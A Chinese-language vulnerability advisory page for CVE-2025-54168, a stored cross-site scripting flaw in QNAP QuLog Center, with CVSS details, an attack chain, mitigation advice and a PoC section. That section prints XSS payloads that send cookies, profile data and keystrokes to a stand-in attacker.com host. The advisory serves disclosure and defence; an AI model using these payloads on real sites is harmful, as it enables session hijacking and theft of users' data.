CVE-2025-54168 CVSS 4.8 中危

CVE-2025-54168: QuLog Center存储型跨站脚本漏洞

披露日期: 2025-11-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-54168

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

QuLog Center

漏洞概述

CVE-2025-54168是QNAP QuLog Center中存在的一个存储型跨站脚本（Stored XSS）漏洞，CVSS评分4.8，中危级别。该漏洞于2025年11月7日披露，由QNAP安全团队（[email protected]）发现并报告。QuLog Center是QNAP NAS设备上用于集中管理日志的应用软件。攻击者需要先获取管理员账户权限，才能利用此漏洞。一旦成功利用，攻击者可以在用户浏览器中执行恶意JavaScript代码，从而绕过安全机制或窃取应用数据。此漏洞影响QuLog Center多个版本，QNAP已于2025年8月27日发布1.8.2.923版本修复此问题。建议所有用户立即升级到最新版本以防止潜在攻击。

技术细节

该漏洞为存储型XSS，攻击者通过管理员账户在QuLog Center的日志管理或用户输入功能中注入恶意JavaScript代码。由于系统未对用户输入进行充分的输入验证和输出编码，恶意脚本被存储在数据库中。当其他用户或管理员访问受影响页面时，恶意代码会在其浏览器上下文中执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户会话、修改页面内容或进行钓鱼攻击。CVSS向量显示攻击复杂度低（AC:L），但需要高权限（PR:H）和用户交互（UI:R），影响范围为已更改组件（S:C），机密性和完整性影响均为低（C:L/I:L），可用性无影响（A:N）。

攻击链分析

STEP 1

步骤1

攻击者通过暴力破解、凭证填充或社工手段获取QuLog Center的管理员账户凭据

STEP 2

步骤2

使用管理员账户登录QuLog Center系统

STEP 3

步骤3

在日志管理、用户配置或系统设置等输入字段中注入恶意XSS payload

STEP 4

步骤4

恶意脚本被存储到数据库中，由于系统未进行输入验证和输出编码

STEP 5

步骤5

当其他用户或管理员访问受影响页面时，恶意脚本在其浏览器上下文中执行

STEP 6

步骤6

攻击者通过执行脚本窃取会话Cookie、劫持账户、修改页面内容或进行进一步内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-54168 PoC: Stored XSS in QuLog Center -->
<!-- Requires admin privileges to inject payload -->

<!-- XSS Payload -->
<script>alert(document.cookie)</script>

<!-- More sophisticated payload for data exfiltration -->
<script>
  // Steal session cookies
  var cookies = document.cookie;
  var img = new Image();
  img.src = 'https://attacker.com/log?c=' + encodeURIComponent(cookies);
</script>

<!-- JSONP-based data theft -->
<script>
  fetch('/api/user/profile')
    .then(r => r.json())
    .then(data => {
      fetch('https://attacker.com/exfil?data=' + JSON.stringify(data));
    });
</script>

<!-- Keylogger payload -->
<script>
  document.addEventListener('keypress', function(e) {
    new Image().src = 'https://attacker.com/klog?k=' + e.key;
  });
</script>

影响范围

QuLog Center < 1.8.2.923

防御指南

临时缓解措施

立即将QuLog Center升级到1.8.2.923或更高版本。如果暂时无法升级，可限制管理员账户访问，实施强密码策略和双因素认证，同时监控日志中的异常请求模式。对所有用户输入实施严格的输入验证，对输出内容进行适当的HTML编码以防止脚本执行。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-54168
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-54168
3 Details https://www.cvedetails.com/cve/CVE-2025-54168/
4 VulDB https://vuldb.com/cve/CVE-2025-54168
5 Link https://www.qnap.com/en/security-advisory/qsa-25-42

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表